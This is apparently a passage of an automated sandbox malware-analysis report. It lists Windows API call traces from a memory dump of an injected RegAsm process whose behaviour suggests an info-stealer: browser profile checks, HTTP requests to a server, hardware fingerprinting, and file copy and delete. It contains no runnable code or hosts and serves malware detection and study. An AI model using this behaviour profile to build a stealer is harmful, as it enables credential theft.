                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                            • String ID: cA$ cA
                                                                                                                                                                                                            • API String ID: 4198075804-3778338052
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2A80), ref: 004187C5
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2AE0), ref: 004187DD
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDB58), ref: 004187F6
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDA08), ref: 0041880E
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBD9D8), ref: 00418826
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDA20), ref: 0041883F
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB4048), ref: 00418857
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBD888), ref: 0041886F
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDA38), ref: 00418888
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBD8D0), ref: 004188A0
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDAC8), ref: 004188B8
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2B00), ref: 004188D1
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB28E0), ref: 004188E9
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2820), ref: 00418901
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2900), ref: 0041891A
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDAE0), ref: 00418932
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417D80
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417D97
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C48
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetVolumeInformationA.KERNEL32(004218D9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C81
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410CCD
                                                                                                                                                                                                              • Part of subcall function 00410C10: HeapAlloc.KERNEL32(00000000), ref: 00410CD4
                                                                                                                                                                                                              • Part of subcall function 00404420: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044EA
                                                                                                                                                                                                              • Part of subcall function 00404420: StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 0040450A
                                                                                                                                                                                                              • Part of subcall function 00412670: StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417E0E), ref: 004126A8
                                                                                                                                                                                                              • Part of subcall function 00412670: ExitProcess.KERNEL32 ref: 004126B3
                                                                                                                                                                                                              • Part of subcall function 00405BC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C8A
                                                                                                                                                                                                              • Part of subcall function 00405BC0: StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 00405CAA
                                                                                                                                                                                                              • Part of subcall function 004120F0: strtok_s.MSVCRT ref: 00412130
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00418187
                                                                                                                                                                                                              • Part of subcall function 00405BC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405E34
                                                                                                                                                                                                              • Part of subcall function 00413490: strtok_s.MSVCRT ref: 004134CE
                                                                                                                                                                                                              • Part of subcall function 00413490: strtok_s.MSVCRT ref: 00413591
                                                                                                                                                                                                              • Part of subcall function 00411BF0: memset.MSVCRT ref: 00411C2B
                                                                                                                                                                                                              • Part of subcall function 00405BC0: HttpOpenRequestA.WININET(00000000,00CBF430,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405E74
                                                                                                                                                                                                              • Part of subcall function 00405BC0: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405E9B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepVolumeWindowsmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3722462685-3916222277
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00CBF140,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,00000000,004200C0,000000FF,?,0040BBB3,00CC1A80), ref: 00407191
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(00CBF140,00000000,00000000,?,0040BBB3,0042689C,0042689C,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426897,?,?,?,00000000,004200C0,000000FF), ref: 0040720E
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC1710,?,?,?,00000000,004200C0,000000FF,?,0040BBB3), ref: 00407226
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00407186, 004071A4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                            • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                            • API String ID: 2929475105-3463377506
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                              • Part of subcall function 00405960: StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                              • Part of subcall function 00405960: HttpOpenRequestA.WININET(00000000,GET,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413985
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
                                                                                                                                                                                                            • String ID: ERROR$ERROR$#B
                                                                                                                                                                                                            • API String ID: 1815705353-4141166672
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 00411330: GetSystemTime.KERNEL32(?,00CBE790,004270B8,?,00000000,00000008,?,?,00000000,00421951,000000FF,?,0040452E,0041FC79,00000014), ref: 00411385
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,004268F2,00000009), ref: 0040A107
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040A2EB
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040A2FF
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040A381
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 211194620-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004103C5
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004103CC
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00CBB3A0,00000000,00020119,00000000), ref: 004103EB
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00CC1910,00000000,00000000,00000000,000000FF), ref: 00410406
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3676486918-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,0042691B,0042691A,?,?), ref: 0040E22D
                                                                                                                                                                                                              • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 004114F0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421A38,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 00411517
                                                                                                                                                                                                              • Part of subcall function 0040CCC0: StrStrA.SHLWAPI(00000000,00CC1B28,?,?,?,?,?,?,?,?,?,?,?,00421600,?), ref: 0040CD2B
                                                                                                                                                                                                              • Part of subcall function 0040CCC0: memcmp.MSVCRT ref: 0040CD69
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                            • String ID: $$Opera GX
                                                                                                                                                                                                            • API String ID: 1439182418-3699434461
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240), ref: 0040EBC0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0), ref: 0040ECC3
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 0040E1D0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042691B,0042691A,?,?), ref: 0040E22D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                            • String ID: Stable\
                                                                                                                                                                                                            • API String ID: 3722407311-272486606
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410BC5
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentProfilelstrcpy
                                                                                                                                                                                                            • String ID: /A$Unknown
                                                                                                                                                                                                            • API String ID: 2831436455-3225385856
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004118BC
                                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004118D7
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004118DE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3183270410-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,Vj@,?,?,?,?,00406A56,?,?,?,?,00000000), ref: 00406975
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                            • String ID: Vj@
                                                                                                                                                                                                            • API String ID: 544645111-2126399917
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FolderPathlstrcpy
                                                                                                                                                                                                            • String ID: viB
                                                                                                                                                                                                            • API String ID: 1699248803-2211462562
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421A38,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 00411517
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                            • API String ID: 3188754299-3946550938
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
